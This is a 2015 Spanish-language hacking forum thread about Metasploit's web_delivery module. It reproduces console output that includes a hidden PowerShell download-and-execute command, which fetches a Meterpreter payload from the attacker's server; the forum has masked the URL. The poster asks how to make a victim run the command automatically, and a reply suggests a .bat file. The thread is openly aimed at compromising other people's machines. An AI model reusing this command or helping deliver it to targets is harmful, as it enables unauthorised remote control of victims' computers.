Web_delivery

Iniciado por RxB, Octubre 17, 2015, 05:34:01 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 17, 2015, 05:34:01 PM Ultima modificación: Octubre 22, 2015, 05:19:36 PM por Expermicid
Hola,

Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit
  • Exploit running as background job.

  • Started HTTP reverse handler on You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
    msf exploit(web_delivery) >
  • Using URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • Local IP: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  • Server started.
  • Run the following command on the target machine:
    powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login'))

    Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:

    powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login'))

    Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.

    Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?

    Si alguien tiene alguna idea se lo agradezco!

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, efectivamente la unica forma que puede funcionarte es con un .bat
Dudo que haya otra forma de hacerlo.

Saludos!
ANTRAX